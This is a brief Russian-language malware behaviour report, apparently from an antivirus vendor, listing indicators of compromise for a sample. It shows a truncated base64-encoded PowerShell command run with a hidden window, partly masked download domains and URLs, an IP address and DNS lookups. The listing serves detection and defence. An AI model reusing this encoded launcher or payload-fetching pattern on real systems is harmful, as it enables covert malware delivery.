Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHgAUQBHAEIAQwBBAF8APQAoACgAJwBLAEMAJwArACcARAAnACkAKwAnAEQANAAnACsAJwAxACcAKQA7ACQAYwBrAEEANAAxAFEAUQBYACAAPQAgACgAJwA4ACcAKwAnADEAMwAnACkAOwAkAE8AUQBrAEEARABVAFUAWgA9ACgAKAAnAHEAJwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1360687.cvr
- 'we###hobia.com':80
- 'pu###aro.com':80
- 'jp##ech.com':80
- '11#.#9.215.166':80
- http://we###hobia.com/images/72Ca/
- http://pu###aro.com/1/ww/
- http://jp##ech.com/css/GOOvqd/
- DNS ASK we###hobia.com
- DNS ASK mo#########se.graficosassociados.com
- DNS ASK pu###aro.com
- DNS ASK jp##ech.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHgAUQBHAEIAQwBBAF8APQAoACgAJwBLAEMAJwArACcARAAnACkAKwAnAEQANAAnACsAJwAxACcAKQA7ACQAYwBrAEEANAAxAFEAUQBYACAAPQAgACgAJwA4ACcAKwAnADEAMwAnACkAOwAkAE8AUQBrAEEARABVAFUAWgA9ACgAKAAnAHEAJwA...' (со скрытым окном)